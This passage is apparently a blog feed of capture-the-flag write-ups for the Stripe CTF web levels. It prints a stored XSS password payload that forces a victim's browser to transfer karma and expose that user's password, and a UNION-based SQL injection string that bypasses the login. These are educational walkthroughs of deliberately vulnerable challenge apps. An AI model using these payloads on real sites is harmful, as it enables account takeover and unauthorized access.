&lt;img alt="level05-second-form.png" class="align-center" src="/images/stripe-ctf-level-5/level05-second-form.png" /&gt;
&lt;p&gt;Then we submit:&lt;/p&gt;
&lt;img alt="level05-second-login.png" class="align-center" src="/images/stripe-ctf-level-5/level05-second-login.png" /&gt;
&lt;p&gt;We clearly see here that the server was interrogated twice.&lt;/p&gt;
&lt;p&gt;And we just have to go back to the login page:&lt;/p&gt;
&lt;img alt="level05-w00t.png" class="align-center" src="/images/stripe-ctf-level-5/level05-w00t.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #4</title><link href="https://allyourbase.utouch.fr/posts/2012/10/27/stripe-ctf-level-4/" rel="alternate"></link><published>2012-10-27T14:22:00+02:00</published><updated>2012-10-27T14:22:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-27:/posts/2012/10/27/stripe-ctf-level-4/</id><summary type="html">&lt;img alt="level04-logo.jpg" class="align-center" src="/images/stripe-ctf-level-4/level04-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-4/stripe-ctf-level04.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;07a8338f0ecf92537daedb60709cd8211a790a23f9c25a101e069614b32da2a8&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level wants you to spread joy over the world. You have a certain
amount of karma you can distribute to people. But to be sure that you
only send karma to people you really trust to be good …&lt;/p&gt;</summary><content type="html">&lt;img alt="level04-logo.jpg" class="align-center" src="/images/stripe-ctf-level-4/level04-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-4/stripe-ctf-level04.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;07a8338f0ecf92537daedb60709cd8211a790a23f9c25a101e069614b32da2a8&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level wants you to spread joy over the world. You have a certain
amount of karma you can distribute to people. But to be sure that you
only send karma to people you really trust to be good, everyone you send
karma to will be able to see your password. What's more, the user
karma_fountain is soooo good that he has infinite karma. Wouldn't it be
nice if you could get access to his account?&lt;/p&gt;
&lt;p&gt;Here, we can see that the user captain sent us one karma. Now, his
password, ''captain_password'', is visible to us.&lt;/p&gt;
&lt;img alt="level04-transfer_captain_cats.png" class="align-center" src="/images/stripe-ctf-level-4/level04-transfer_captain_cats.png" /&gt;
&lt;p&gt;So, all we have to do to get karma_fountain's password is to get him to
send us karma. Two ways for this: we could be so good that he'll want to
give us karma, or we can force him a little bit.&lt;/p&gt;
&lt;p&gt;So, what are our ways to interact with karma_fountain? The site doesn't
offer some kind of internal messaging, we don't have an email address...
All we can do is send karma_fountain some karma. Then, he'll see our
password on his profile page. Hmmm, our password will be written to its
profile page:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File views/home.erb, line 52&lt;/span&gt;
&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sx"&gt;% @registered_users.each &lt;/span&gt;&lt;span class="k"&gt;do&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="sx"&gt;%&amp;gt;&lt;/span&gt;
&lt;span class="sx"&gt;&amp;lt;% last_active = user[:last_active].strftime(&amp;#39;%H:%M:%S UTC&amp;#39;) %&amp;gt;&lt;/span&gt;
&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sx"&gt;% if &lt;/span&gt;&lt;span class="vi"&gt;@trusts_me&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;include?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="ss"&gt;:username&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="sx"&gt;%&amp;gt;&lt;/span&gt;
&lt;span class="sx"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sx"&gt;%= user[:username] %&amp;gt;&lt;/span&gt;
&lt;span class="sx"&gt;(password: &amp;lt;%=&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="ss"&gt;:password&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="sx"&gt;%&amp;gt;, last active &amp;lt;%= last_active %&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/li&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The password is not sanitized before it is displayed. Is it before it's
registered in the database?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File srv.rb, line 168&lt;/span&gt;
&lt;span class="no"&gt;DB&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="ss"&gt;:users&lt;/span&gt;&lt;span class="o"&gt;].&lt;/span&gt;&lt;span class="n"&gt;insert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="ss"&gt;:username&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="ss"&gt;:password&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="ss"&gt;:karma&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="no"&gt;STARTING_KARMA&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="ss"&gt;:last_active&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="no"&gt;Time&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;now&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;utc&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Nope. So if we put some javascript code as our password, and then we
send karma to karma_fountain, our password (i.e. the javascript code)
will be embedded in karma_fountain's page. If this javascript tells
karma_fountain's browser to send us karma, its password will be
displayed on our home page.&lt;/p&gt;
&lt;p&gt;So, let's create a user evil_hacker, with the following password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;form&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createElement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;form&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;form&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;method&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;post&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;form&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;action&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;transfer&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;to_field&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createElement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;input&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;to_field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;hidden&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;to_field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;to&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;to_field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;value&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;cats&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;form&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;appendChild&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;to_field&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;amount_field&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createElement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;input&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;amount_field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;hidden&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;amount_field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;amount&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;amount_field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setAttribute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;value&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;form&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;appendChild&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;amount_field&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;appendChild&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;form&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;form&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;submit&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Okay, I know this code is way too long, but javascript is really not my
strong suit. Plus, there is the problem that once karma_fountain's
browser executes the javascript, the transfer will take place, then
karma_fountain will be redirected to its homepage, where the transfer
will take place etc. Not very sly. So, there is room for improvement on
this code. It's just to demonstrate the attack.&lt;/p&gt;
&lt;img alt="level04-evil_hacker_register.png" class="align-center" src="/images/stripe-ctf-level-4/level04-evil_hacker_register.png" /&gt;
&lt;p&gt;We connect as evil_hacker and send one karma to karma_fountain. Then,
we wait for him to connect (the CTF staff had put up a bot which would
look at its profile page every five minutes). Let's look at our profile:&lt;/p&gt;
&lt;img alt="level04-w00t.png" class="align-center" src="/images/stripe-ctf-level-4/level04-w00t.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #3</title><link href="https://allyourbase.utouch.fr/posts/2012/10/26/stripe-ctf-level-3/" rel="alternate"></link><published>2012-10-26T23:34:00+02:00</published><updated>2012-10-26T23:34:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-26:/posts/2012/10/26/stripe-ctf-level-3/</id><summary type="html">&lt;img alt="level03-logo.png" class="align-center" src="/images/stripe-ctf-level-3/level03-logo.png" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-3/level03-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;8710c082daed1839806addebeda44c6e5496d44a33f7eb3f23a577b6a5fc26d5&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;The company who built the vault of level 0 learned its lesson: you now
have to identify before accessing your guarded secrets.&lt;/p&gt;
&lt;p&gt;The company kindly tells you that other users have already chosen to
use their product, and even …&lt;/p&gt;</summary><content type="html">&lt;img alt="level03-logo.png" class="align-center" src="/images/stripe-ctf-level-3/level03-logo.png" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-3/level03-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;8710c082daed1839806addebeda44c6e5496d44a33f7eb3f23a577b6a5fc26d5&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;The company who built the vault of level 0 learned its lesson: you now
have to identify before accessing your guarded secrets.&lt;/p&gt;
&lt;p&gt;The company kindly tells you that other users have already chosen to
use their product, and even what the stored secrets are.&lt;/p&gt;
&lt;img alt="level03-index.png" class="align-center" src="/images/stripe-ctf-level-3/level03-index.png" /&gt;
&lt;p&gt;Sorry for math and physics fan, but we'll focus on bob's secret.&lt;/p&gt;
&lt;p&gt;So, let's look at the code used to identify users:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File secretvault.py, line 74&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;login&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;flask&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;form&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;flask&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;form&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Must provide username&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Must provide password&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;

    &lt;span class="n"&gt;conn&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sqlite3&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data_dir&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;users.db&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="n"&gt;cursor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cursor&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="n"&gt;query&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&amp;quot;SELECT id, password_hash, salt FROM users&lt;/span&gt;
&lt;span class="s2"&gt;            WHERE username = &amp;#39;{0}&amp;#39; LIMIT 1&amp;quot;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;cursor&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cursor&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;fetchone&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;There&amp;#39;s no such user {0}!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;password_hash&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;salt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;res&lt;/span&gt;

    &lt;span class="n"&gt;calculated_hash&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hashlib&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sha256&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;salt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;calculated_hash&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;password_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;That&amp;#39;s not the password for {0}!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;flask&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;user_id&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;flask&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;absolute_url&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Wow. Hashed passwords, and even salt! Seems pretty secure. But the
statements aren't prepared: they are vulnerable to SQL injection. We are
gonna use a &lt;code&gt;UNION&lt;/code&gt; statement, to force the id, the password's
hash and the salt to be arbitrary values. We can see from the
&lt;code&gt;generate_data.py&lt;/code&gt; file that the default users were added in a
random order, so we don't know what bob's id is. Since there are only
three values, we can try each by hand. For the sake of simplicity, we'll
suppose here that bob's id is 1.&lt;/p&gt;
&lt;p&gt;So, let's say we put this as a user in the form:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;dummy-user' UNION SELECT 1, 'hash', 'salt&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The statement will become:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;password_hash&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;salt&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;users&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;dummy-user&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;UNION&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;hash&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;salt&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This way, the first part of the statement will yield an empty row, and
the second part will yield 1, 'hash', 'salt'. If we want to connect with
the password 'foo', with the salt 'bar', we can compute the password's
hash:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sha256('foobar') =
c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;We fill the form this way:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;user = dummy-user' UNION SELECT 1,
'c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2',
'bar&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;p&gt;&lt;code&gt;password = foo&lt;/code&gt;&lt;/p&gt;
&lt;img alt="level03-filled-form.png" class="align-center" src="/images/stripe-ctf-level-3/level03-filled-form.png" /&gt;
&lt;p&gt;We just have to submit to retrieve bob's secret:&lt;/p&gt;
&lt;img alt="level03-w00t.png" class="align-center" src="/images/stripe-ctf-level-3/level03-w00t.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
</content></entry><entry><title>Stripe CTF: Level #2</title><link href="https://allyourbase.utouch.fr/posts/2012/10/13/stripe-ctf-level-2/" rel="alternate"></link><published>2012-10-13T16:11:00+02:00</published><updated>2012-10-13T16:11:00+02:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-10-13:/posts/2012/10/13/stripe-ctf-level-2/</id><summary type="html">&lt;img alt="level02-logo.png" class="align-center" src="/images/stripe-ctf-level-2/level02-logo.png" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-2/level02-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;d175b624ed888badd795c5474ae855f711e856cc41c0757059594babe8f23413&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level is a whole social network!&lt;/p&gt;
&lt;p&gt;Okay, it's not, it's just a page with a profile picture. But on the
bottom of the page, you can see something interesting: &amp;quot;Password for
Level 3 (accessible only to members of …&lt;/p&gt;</summary><content type="html">&lt;img alt="level02-logo.png" class="align-center" src="/images/stripe-ctf-level-2/level02-logo.png" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-2/level02-code.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256: &lt;code&gt;d175b624ed888badd795c5474ae855f711e856cc41c0757059594babe8f23413&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level is a whole social network!&lt;/p&gt;
&lt;p&gt;Okay, it's not, it's just a page with a profile picture. But on the
bottom of the page, you can see something interesting: &amp;quot;Password for
Level 3 (accessible only to members of the club)&amp;quot;. Of course, if you
click on it it doesn't work. Let's see how we can access this file.&lt;/p&gt;
&lt;p&gt;The key here is that you can upload your picture so that it's displayed
on your profile page.&lt;/p&gt;
